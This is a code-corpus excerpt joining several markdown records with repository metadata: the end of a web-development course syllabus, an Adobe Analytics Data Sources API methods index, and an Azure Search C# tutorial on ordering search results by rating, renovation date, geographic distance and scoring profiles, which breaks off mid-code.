* Web 2.0, web 3.0, Domain Name and Domain Name Server
* Web Development Design Principles and Guidelines
* Current Web Design Trends from HTML 1.0 to HTML5
* What is HTML 5?
* Elements, tags, attributes, images, hyperlinks
* HTML5 lists and forms
* HTML5 Graphics
* HTML 5 Basic APIs
## Module 2 : Getting Started with CSS- 10 hrs
* What and Why it is called CSS?
* Why is CSS important?
* CSS Rule
* Incorporating CSS in HTML page
* Using HTML classes and IDs
* CSS box model and CSS outline
* Layout and Positioning
* Responsive Design using CSS
## Module 3 : Getting Started with JavaScript- 12 hrs
* JavaScript, HTML5 and CSS3
* JavaScript overview
* Your first HTML/CSS/JS page
* Variables, values, functions, operators, and expressions
* Conditional statements, loops and logical operators
* Functions and CallBacks
* Organizing the code in separate files: HTML, CSS, and JavaScript
* Building and validating the login and sign-up forms
* Integrating the sign-up form with Facebook and Gmail
* JSON Notation
## Module 4 : Getting Started with MySQL- 6 hrs
* Installation and Configuration of MySQL
* Creation of Table using DDL
* Insert, Delete and Update queries
* Creation of SQL Script
## Module 5 : Getting Started with PHP- 12 hrs
* Introduction of PHP
* Variables, Data types and expressions, Arrays
* Conditional statements
* Connecting with MySQL Database
* Insert, Update and retrieve to/from MySQL database
* Sending Email, Cookies and Sessions
## Module 6 : Building your own responsive website- 10 hrs
## Module 7 : Hosting your website- 2 hrs
* Finding your Domain and Hosting Space
* Uploading and configuring your website using GoDaddy, etc.
* How to increase your website hits?
| 29.5 | 65 | 0.763771 | eng_Latn | 0.832815 |
97849b590ad1c6b749a320b67734bf25322bc9dc | 1,787 | md | Markdown | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | 1 | 2021-02-08T01:27:55.000Z | 2021-02-08T01:27:55.000Z | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | 1 | 2021-02-23T11:10:08.000Z | 2021-02-23T11:49:30.000Z | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | null | null | null | # Methods
Methods for Data Sources 1.3.
- **[SetupFull](../methods/r_setupFull.md)**
Creates a new full processing data source.
- **[SetupTraffic](../methods/r_setupTraffic.md)**
Creates a new Traffic Data Source.
- **[SetupWebLog](../methods/r_setupWebLog.md)**
Creates a new WebLog Data Source.
- **[SetupGeneric](../methods/r_setupGeneric.md)**
Creates a new Generic Data Source.
- **[GetIDs](../methods/r_getIDs.md)**
Returns a list of data source IDs associated with the specified report suite.
- **[GetInfo](../methods/r_getInfo.md)**
Returns information about the data sources associated with the specified report suite.
- **[BeginDataBlock](../methods/r_beginDataBlock.md)**
Submits the first HTTP data block in a Data Sources submission.
- **[AppendDataBlock](../methods/r_appendDataBlock.md)**
Appends an additional HTTP data block to a Data Sources data submission.
- **[ProcessIncompleteVisits](../methods/r_processIncompleteVisits.md)**
Instructs Data Sources to process data related to site visits that did not end in the current file or data block.
- **[GetFileIDs](../methods/r_getFileIDs.md)**
Returns a list of files or data blocks submitted to the specified data source.
- **[GetFileInfo](../methods/r_getFileInfo.md)**
Returns information about the files submitted to the specified data source.
- **[GetFileStatus](../methods/r_getFileStatus.md)**
Returns status information about the files submitted to the specified data source.
- **[Restart](../methods/r_restart.md)**
Restarts processing of the specified Full Processing data source.
- **[Deactivate](../methods/r_deactivate.md)**
Deactivates the specified data source.
**Parent topic:** [Data Sources Version 1.3](../c_data_sources_api_1_3.md)
| 49.638889 | 113 | 0.730834 | eng_Latn | 0.571401 |
9785e6181a63a905e8e12ac10c14542f012946c3 | 47,576 | md | Markdown | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-29T16:59:33.000Z | 2019-09-29T16:59:33.000Z | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'C# tutorial: Order the results - Azure Search'
description: This tutorial builds on the "Search results pagination - Azure Search" project to add ordering of search results. Learn how to order results on a primary property, and, for results that have the same primary property, how to order results on a secondary property. Finally, learn how to order results based on scoring profiles.
services: search
ms.service: search
ms.topic: tutorial
ms.author: v-pettur
author: PeterTurcan
ms.date: 06/21/2019
ms.openlocfilehash: 32e253b4e131d753ab6937d0aa2a49bda471e091
ms.sourcegitcommit: c63e5031aed4992d5adf45639addcef07c166224
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 06/28/2019
ms.locfileid: "67466578"
---
# <a name="c-tutorial-order-the-results---azure-search"></a>C# tutorial: Order the results - Azure Search
Up to this point in this series of tutorials, results have been returned, and displayed, in a default order. This may be the order in which the data is located, or a default _scoring profile_ may have been defined, which is used when no ordering parameters are specified. In this tutorial we look at ordering results on a primary property and then, for results that share the same primary property, at ordering that selection on a secondary property. As an alternative to ordering based on numerical values, the final example shows how to order results based on custom scoring profiles. We also go a bit deeper into displaying _complex types_.
To make it easy to compare the returned results, this project builds onto the infinite scrolling project created in the [C# tutorial: Search results pagination - Azure Search](tutorial-csharp-paging.md) tutorial.
In this tutorial, you learn how to:
> [!div class="checklist"]
> * Order results based on one property
> * Order results based on multiple properties
> * Filter results based on a distance from a geographical point
> * Order results based on a scoring profile
## <a name="prerequisites"></a>Prerequisites
To complete this tutorial, you need to:
Have the infinite scrolling version of the [C# tutorial: Search results pagination - Azure Search](tutorial-csharp-paging.md) project up and running. This project can either be your own version, or you can install it from GitHub: [Create first app](https://github.com/Azure-Samples/azure-search-dotnet-samples).
## <a name="order-results-based-on-one-property"></a>Order results based on one property
When we order results based on one property, say hotel rating, we do not just want the ordered results, we also want confirmation that the order is correct. In other words, if we order on rating, we should display the rating in the view.
In this tutorial we also add a bit more to the display of results: the cheapest room rate and the most expensive room rate for each hotel. As we dig into ordering, we will keep adding values to the view so that whatever we are ordering on is also displayed.
There is no need to modify any of the models to enable ordering. Only the view and the controller need updating. Start by opening the home controller.
### <a name="add-the-orderby-property-to-the-search-parameters"></a>Add the OrderBy property to the search parameters
1. To order results based on a single numerical property, simply set the **OrderBy** parameter to the name of the property. In the **Index(SearchData model)** method, add the following line to the search parameters.
```cs
OrderBy = new[] { "Rating desc" },
```
>[!Note]
   > The default direction is ascending, though you can add **asc** to a property to make this clear. Descending order is specified by adding **desc**.
2. Now run the app, and enter any common search term. The results may or may not be displayed in the correct order, as neither you as the developer, nor the user, has any easy way of verifying the results!
3. Let's make it clear that the results are ordered on rating. First, replace the **box1** and **box2** classes in the hotels.css file with the following classes (these classes are all the new ones we need in this tutorial).
```html
textarea.box1A {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 14pt;
color: blue;
padding-left: 5px;
text-align: left;
}
textarea.box1B {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 14pt;
color: blue;
text-align: right;
padding-right: 5px;
}
textarea.box2A {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 12pt;
color: blue;
padding-left: 5px;
text-align: left;
}
textarea.box2B {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 12pt;
color: blue;
text-align: right;
padding-right: 5px;
}
textarea.box3 {
width: 648px;
height: 100px;
border: none;
background-color: azure;
font-size: 12pt;
padding-left: 5px;
margin-bottom: 24px;
}
```
>[!Tip]
>Browsers often cache css files, and this can lead to an old css file being used, and your edits being ignored. A good way around this is to add a query string with a version parameter to the link. For example:
>
>```html
> <link rel="stylesheet" href="~/css/hotels.css?v1.1" />
>```
>
>Update the version number if you think an old css file is being used by your browser.
4. Add the **Rating** property to the **Select** parameter, in the **Index(SearchData model)** method.
```cs
Select = new[] { "HotelName", "Description", "Rating"},
```
5. Open the view (index.cshtml), and replace the rendering loop (**<!-- Show the hotel data. -->**) with the following code.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
6. The rating should be available both on the first displayed page, and on the subsequent pages retrieved via infinite scrolling. To cover the scrolling case, we need to update both the **Next** action in the controller and the **scrolled** function in the view. Starting with the controller, change the **Next** method to the following code. This code creates and passes on the rating text.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
// Add three strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
7. Now update the **scrolled** function in the view, to display the rating text.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 3) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 2] + '</textarea>';
}
});
}
}
</script>
```
8. Now run the app again. Search on any common term, such as "wifi", and verify that the results are ordered in descending order of hotel rating.
    ![Ordering results based on rating](./media/tutorial-csharp-create-first-app/azure-search-orders-rating.png)
You will notice that several hotels have an identical rating, and so their appearance in the display is again the order in which the data was found, which is arbitrary.
Before we look into adding a second level of ordering, let's add some code to display the range of room rates. We add this code both to show extracting data from a _complex type_, and also so that we can discuss ordering results based on price (cheapest first, perhaps).
### <a name="add-the-range-of-room-rates-to-the-view"></a>Add the range of room rates to the view
1. Add properties containing the cheapest and the most expensive room rate to the Hotel.cs model.
```cs
// Room rate range
public double cheapest { get; set; }
public double expensive { get; set; }
```
2. Calculate the room rates at the end of the **Index(SearchData model)** action in the home controller. Add the calculations after the temporary data has been stored.
```cs
// Ensure TempData is stored for the next call.
TempData["page"] = page;
TempData["searchfor"] = model.searchText;
// Calculate the room rate ranges.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
// Calculate room rates.
var cheapest = 0d;
var expensive = 0d;
for (var r = 0; r < model.resultList.Results[n].Document.Rooms.Length; r++)
{
var rate = model.resultList.Results[n].Document.Rooms[r].BaseRate;
if (rate < cheapest || cheapest == 0)
{
cheapest = (double)rate;
}
if (rate > expensive)
{
expensive = (double)rate;
}
}
model.resultList.Results[n].Document.cheapest = cheapest;
model.resultList.Results[n].Document.expensive = expensive;
}
```
3. Add the **Rooms** property to the **Select** parameter of the **Index(SearchData model)** action method of the controller.
```cs
Select = new[] { "HotelName", "Description", "Rating", "Rooms" },
```
4. Change the rendering loop in the view to display the rate range for the first page of results.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}" , rateText, new { @class = "box2A" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
5. Change the **Next** method in the home controller to pass on the range of rates for subsequent pages of results.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
var rateText = $"Rates from ${model.resultList.Results[n].Document.cheapest} to ${model.resultList.Results[n].Document.expensive}";
// Add strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(rateText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
6. Update the **scrolled** function in the view to handle the room rates text.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 4) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
                           div.innerHTML += '\n<textarea class="box3">' + data[i + 3] + '</textarea>';
}
});
}
}
</script>
```
7. Run the app, and verify that the room rate ranges are displayed.
    ![Displaying room rates](./media/tutorial-csharp-create-first-app/azure-search-orders-rates.png)
The **OrderBy** property of the search parameters will not accept an entry such as **Rooms.BaseRate** to provide the cheapest room rate, even if the rooms were already sorted on rate (which they are not). To display hotels ordered by room rate with our sample data set, you would have to sort the results in your home controller, and send those results to the view in the desired order.
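If you want to experiment with that, the following minimal sketch (our own illustration, not one of the tutorial steps) re-orders the page of results already retrieved, using the **cheapest** value calculated above. Note that it only sorts the single page of results held in the model, not the full result set, which is why restructuring the data is the better long-term answer.
```cs
// Minimal sketch: order the current page of results by the computed
// cheapest room rate, before the model is handed to the view.
// Requires "using System.Linq;" at the top of the controller file.
var byCheapest = model.resultList.Results
    .OrderBy(r => r.Document.cheapest)
    .ToList();
```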
## <a name="order-results-based-on-multiple-values"></a>Order results based on multiple values
The question now is how to differentiate between hotels with the same rating. One good approach would be to order based on when the hotel was last renovated. In other words, the more recently a hotel was renovated, the higher it appears in the results.
1. To add the second level of ordering, change the **OrderBy** and **Select** properties in the **Index(SearchData model)** method to include the **LastRenovationDate** property.
```cs
OrderBy = new[] { "Rating desc", "LastRenovationDate desc" },
Select = new[] { "HotelName", "Description", "Rating", "Rooms", "LastRenovationDate" },
```
>[!Tip]
>Any number of properties can be specified in the **OrderBy** list. If hotels had the same rating and renovation date, a third property could be specified to differentiate between them.
2. Again, we need to see the renovation date in the view, just to be sure the ordering is correct. For such a thing as a renovation, probably just the year is needed. Change the rendering loop in the view to the following code.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var lastRenovatedText = $"Last renovated: { Model.resultList.Results[i].Document.LastRenovationDate.Value.Year}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}" , rateText, new { @class = "box2A" })
@Html.TextArea($"renovation{i}", lastRenovatedText, new { @class = "box2B" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
3. Change the **Next** method in the home controller to forward the year component of the last renovation date.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
var rateText = $"Rates from ${model.resultList.Results[n].Document.cheapest} to ${model.resultList.Results[n].Document.expensive}";
var lastRenovatedText = $"Last renovated: {model.resultList.Results[n].Document.LastRenovationDate.Value.Year}";
// Add strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(rateText);
nextHotels.Add(lastRenovatedText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
4. Change the **scrolled** function in the view to display the renovation text.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 5) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
div.innerHTML += '\n<textarea class="box2B">' + data[i + 3] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 4] + '</textarea>';
}
});
}
}
</script>
```
5. Run the app. Search on a common term, such as "pool" or "view", and verify that hotels with the same rating are now displayed in descending order of renovation date.
    ![Ordering on renovation date for hotels with equal ratings](./media/tutorial-csharp-create-first-app/azure-search-orders-renovation.png)
## <a name="filter-results-based-on-a-distance-from-a-geographical-point"></a>Filter results based on a distance from a geographical point
Ratings and renovation dates are examples of properties that are best displayed in descending order. An alphabetical listing would be a good example of ascending order being useful (for example, if there was just one **OrderBy** property, and it was set to **HotelName**, an alphabetical ordering would be displayed). However, for our sample data, distance from a geographical point would be more appropriate.
Displaying results based on geographical distance takes several steps.
1. Filter out any hotels that fall outside of a given radius from a given point, by specifying a filter with longitude, latitude, and radius parameters. Longitude is given first in the POINT function. The radius is in kilometers.
```cs
// "Location" must match the field name in the Hotel class.
// Distance (the radius) is in kilometers.
// Point order is Longitude then Latitude.
Filter = $"geo.distance(Location, geography'POINT({model.lon} {model.lat})') le {model.radius}",
```
2. The filter above does _not_ order the results based on distance, it simply removes the outliers. To order the results, specify an **OrderBy** setting that calls the geoDistance method.
```cs
OrderBy = new[] { $"geo.distance(Location, geography'POINT({model.lon} {model.lat})') asc" },
```
3. Although Azure Search returns results when given a distance filter, the calculated distance between the data and the specified point is _not_ returned. Recalculate this value in the view or the controller if you want it displayed in the results (a short usage sketch appears at the end of this list).
The following code calculates the distance between two lat/lon points.
```cs
const double EarthRadius = 6371;
public static double Degrees2Radians(double deg)
{
return deg * Math.PI / 180;
}
public static double DistanceInKm( double lat1, double lon1, double lat2, double lon2)
{
double dlon = Degrees2Radians(lon2 - lon1);
double dlat = Degrees2Radians(lat2 - lat1);
double a = (Math.Sin(dlat / 2) * Math.Sin(dlat / 2)) + Math.Cos(Degrees2Radians(lat1)) * Math.Cos(Degrees2Radians(lat2)) * (Math.Sin(dlon / 2) * Math.Sin(dlon / 2));
double angle = 2 * Math.Atan2(Math.Sqrt(a), Math.Sqrt(1 - a));
return angle * EarthRadius;
}
```
4. Now it is up to you to tie these principles together. Building a map-based app from these code snippets is, however, left as an exercise for the reader, rather than being created step by step in this tutorial. To take this example further, consider entering a city name along with a radius, or locating a point on a map and selecting a radius. To investigate these options further, see the following resources:
    * [Azure Maps documentation](https://docs.microsoft.com/azure/azure-maps/)
    * [Search for a location using Azure Maps Search services](https://docs.microsoft.com/azure/azure-maps/how-to-search-for-address)
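As a quick illustration of the helper above, the following sketch (ours, with made-up Seattle-area coordinates) computes the distance to the first returned document, assuming the **Location** field of the Hotel model is a GeographyPoint exposing **Latitude** and **Longitude** properties.
```cs
// Illustrative only: distance in km from the search point to the first result.
double searchLat = 47.61, searchLon = -122.33;
var doc = model.resultList.Results[0].Document;
double km = DistanceInKm(searchLat, searchLon,
                         doc.Location.Latitude, doc.Location.Longitude);
```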
## <a name="order-results-based-on-a-scoring-profile"></a>Order results based on a scoring profile
The examples given so far in this tutorial show how to order on numerical values (rating, renovation date, geographical distance), providing an _exact_ process of ordering. However, some searches and some data do not lend themselves to such a simple comparison between two data elements. Azure Search includes the concept of _scoring_. _Scoring profiles_ can be specified for a set of data, enabling more complex and qualitative comparisons, which should be most valuable when, say, comparing text data to decide which entry should be displayed first.
Scoring profiles are not defined by users, but typically by the administrators of a data set. Several scoring profiles have been set up on the hotels data. Let's look at how a scoring profile is defined, then try writing code to search on them.
### <a name="how-scoring-profiles-are-defined"></a>How scoring profiles are defined
Let's look at three examples of scoring profiles, and consider how each _should_ affect the order of results. As an app developer, you do not write these profiles yourself; they are written by the administrator of the data set. It is, however, helpful to see the syntax.
1. This is the default scoring profile for the hotels data set, used when no **OrderBy** or **ScoringProfile** parameter is specified. This profile boosts the _score_ of a hotel if the search text is found in the hotel name, description, or list of tags (amenities). Notice how the weights of the scoring favor certain fields. If the search text appears in another field, one not listed here, it will have a weight of 1. Obviously, the higher the score, the earlier a result appears in the view.
```cs
{
"name": "boostByField",
"text": {
"weights": {
"HotelName": 2,
"Description": 1.5,
"Description_fr": 1.5,
"Tags": 3
}
}
}
```
2. The following scoring profile boosts the score significantly if a provided parameter contains one or more of the list of tags (which we call "amenities"). The key point of this profile is that the parameter _must_ be provided, and must contain text. If the parameter is empty, or not provided, an error is thrown.
```cs
{
"name": "boostAmenities",
"functions": [
{
"type": "tag",
"fieldName": "Tags",
"boost": 5,
"tag": {
"tagsParameter": "amenities"
}
}
]
}
```
3. In this third example, the rating gives a significant boost to the score. The date the hotel was last renovated also boosts the score, but only if that date falls within 730 days (2 years) of the current date.
```cs
{
"name": "renovatedAndHighlyRated",
"functions": [
{
"type": "magnitude",
"fieldName": "Rating",
"boost": 20,
"interpolation": "linear",
"magnitude": {
"boostingRangeStart": 0,
"boostingRangeEnd": 5,
"constantBoostBeyondRange": false
}
},
{
"type": "freshness",
"fieldName": "LastRenovationDate",
"boost": 10,
"interpolation": "quadratic",
"freshness": {
"boostingDuration": "P730D"
}
}
]
}
```
Now let's put these profiles to work, and see if they behave the way we think they should!
### <a name="add-code-to-the-view-to-compare-profiles"></a>Add code to the view to compare profiles
1. Open the index.cshtml file, and replace the <body> section with the following code.
```cs
<body>
@using (Html.BeginForm("Index", "Home", FormMethod.Post))
{
<table>
<tr>
<td></td>
<td>
<h1 class="sampleTitle">
<img src="~/images/azure-logo.png" width="80" />
Hotels Search - Order Results
</h1>
</td>
</tr>
<tr>
<td></td>
<td>
<!-- Display the search text box, with the search icon to the right of it. -->
<div class="searchBoxForm">
@Html.TextBoxFor(m => m.searchText, new { @class = "searchBox" }) <input class="searchBoxSubmit" type="submit" value="">
</div>
<div class="searchBoxForm">
<b> Order: </b>
@Html.RadioButtonFor(m => m.scoring, "Default") Default
@Html.RadioButtonFor(m => m.scoring, "RatingRenovation") By numerical Rating
@Html.RadioButtonFor(m => m.scoring, "boostAmenities") By Amenities
@Html.RadioButtonFor(m => m.scoring, "renovatedAndHighlyRated") By Renovated date/Rating profile
</div>
</td>
</tr>
<tr>
<td valign="top">
<div id="facetplace" class="facetchecks">
@if (Model != null && Model.facetText != null)
{
<h5 class="facetheader">Amenities:</h5>
<ul class="facetlist">
@for (var c = 0; c < Model.facetText.Length; c++)
{
<li> @Html.CheckBoxFor(m => m.facetOn[c], new { @id = "check" + c.ToString() }) @Model.facetText[c] </li>
}
</ul>
}
</div>
</td>
<td>
@if (Model != null && Model.resultList != null)
{
// Show the total result count.
<p class="sampleText">
@Html.DisplayFor(m => m.resultList.Count) Results <br />
</p>
<div id="myDiv" style="width: 800px; height: 450px; overflow-y: scroll;" onscroll="scrolled()">
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var lastRenovatedText = $"Last renovated: { Model.resultList.Results[i].Document.LastRenovationDate.Value.Year}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
string amenities = string.Join(", ", Model.resultList.Results[i].Document.Tags);
string fullDescription = Model.resultList.Results[i].Document.Description;
fullDescription += $"\nAmenities: {amenities}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}", rateText, new { @class = "box2A" })
@Html.TextArea($"renovation{i}", lastRenovatedText, new { @class = "box2B" })
@Html.TextArea($"desc{i}", fullDescription, new { @class = "box3" })
}
</div>
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 5) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
div.innerHTML += '<textarea class="box2B">' + data[i + 3] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 4] + '</textarea>';
}
});
}
}
</script>
}
</td>
</tr>
</table>
}
</body>
```
2. Open the SearchData.cs file, and replace the **SearchData** class with the following code.
```cs
public class SearchData
{
public SearchData()
{
}
// Constructor to initialize the list of facets sent from the controller.
public SearchData(List<string> facets)
{
facetText = new string[facets.Count];
for (int i = 0; i < facets.Count; i++)
{
facetText[i] = facets[i];
}
}
// Array to hold the text for each amenity.
public string[] facetText { get; set; }
        // Array to hold the setting for each amenity.
public bool[] facetOn { get; set; }
// The text to search for.
public string searchText { get; set; }
// Record if the next page is requested.
public string paging { get; set; }
// The list of results.
public DocumentSearchResult<Hotel> resultList;
public string scoring { get; set; }
}
```
3. Open the hotels.css file, and add the following HTML classes.
```html
.facetlist {
list-style: none;
}
.facetchecks {
width: 250px;
display: normal;
color: #666;
margin: 10px;
padding: 5px;
}
.facetheader {
font-size: 10pt;
font-weight: bold;
color: darkgreen;
}
```
### <a name="add-code-to-the-controller-to-specify-a-scoring-profile"></a>Add code to the controller to specify a scoring profile
1. Open the home controller file. Add the following **using** statement (to support the creation of lists).
```cs
using System.Linq;
```
2. For this example, the initial call to **Index** needs to do a bit more than just return the starting view. The method now searches for up to 20 amenities to display in the view.
```cs
public async Task<ActionResult> Index()
{
InitSearch();
// Set up the facets call in the search parameters.
SearchParameters sp = new SearchParameters()
{
// Search for up to 20 amenities.
Facets = new List<string> { "Tags,count:20" },
};
DocumentSearchResult<Hotel> searchResult = await _indexClient.Documents.SearchAsync<Hotel>("*", sp);
// Convert the results to a list that can be displayed in the client.
List<string> facets = searchResult.Facets["Tags"].Select(x => x.Value.ToString()).ToList();
// Initiate a model with a list of facets for the first view.
SearchData model = new SearchData(facets);
// Save the facet text for the next view.
SaveFacets(model, false);
// Render the view including the facets.
return View(model);
}
```
3. We need two private methods to save the facets to temporary storage, and to recover them from temporary storage and populate a model.
```cs
// Save the facet text to temporary storage, optionally saving the state of the check boxes.
private void SaveFacets(SearchData model, bool saveChecks = false)
{
for (int i = 0; i < model.facetText.Length; i++)
{
TempData["facet" + i.ToString()] = model.facetText[i];
if (saveChecks)
{
TempData["faceton" + i.ToString()] = model.facetOn[i];
}
}
TempData["facetcount"] = model.facetText.Length;
}
        // Recover the facet text to a model, optionally recovering the state of the check boxes.
private void RecoverFacets(SearchData model, bool recoverChecks = false)
{
// Create arrays of the appropriate length.
model.facetText = new string[(int)TempData["facetcount"]];
if (recoverChecks)
{
model.facetOn = new bool[(int)TempData["facetcount"]];
}
for (int i = 0; i < (int)TempData["facetcount"]; i++)
{
model.facetText[i] = TempData["facet" + i.ToString()].ToString();
if (recoverChecks)
{
model.facetOn[i] = (bool)TempData["faceton" + i.ToString()];
}
}
}
```
4. We need to set the **OrderBy** and **ScoringProfile** parameters as appropriate. Replace the existing **Index(SearchData model)** method with the following method.
```cs
public async Task<ActionResult> Index(SearchData model)
{
try
{
InitSearch();
int page;
if (model.paging != null && model.paging == "next")
{
// Recover the facet text, and the facet check box settings.
RecoverFacets(model, true);
// Increment the page.
page = (int)TempData["page"] + 1;
// Recover the search text.
model.searchText = TempData["searchfor"].ToString();
}
else
{
// First search with text.
// Recover the facet text, but ignore the check box settings, and use the current model settings.
RecoverFacets(model,false);
// First call. Check for valid text input, and valid scoring profile.
if (model.searchText == null)
{
model.searchText = "";
}
if (model.scoring == null)
{
model.scoring = "Default";
}
page = 0;
}
// Set empty defaults for ordering and scoring parameters.
var orderby = new List<string>();
string profile = "";
var scoringParams = new List<ScoringParameter>();
// Set the ordering based on the user's radio button selection.
switch (model.scoring)
{
case "RatingRenovation":
orderby.Add("Rating desc");
orderby.Add("LastRenovationDate desc");
break;
case "boostAmenities":
{
profile = model.scoring;
var setAmenities = new List<string>();
// Create a string list of amenities that have been clicked.
for (int a = 0; a < model.facetOn.Length; a++)
{
if (model.facetOn[a])
{
setAmenities.Add(model.facetText[a]);
}
}
if (setAmenities.Count > 0)
{
// Only set scoring parameters if there are any.
var sp = new ScoringParameter("amenities", setAmenities);
scoringParams.Add(sp);
}
else
{
// No amenities selected, so set profile back to default.
profile = "";
}
}
break;
case "renovatedAndHighlyRated":
profile = model.scoring;
break;
default:
break;
}
// Setup the search parameters.
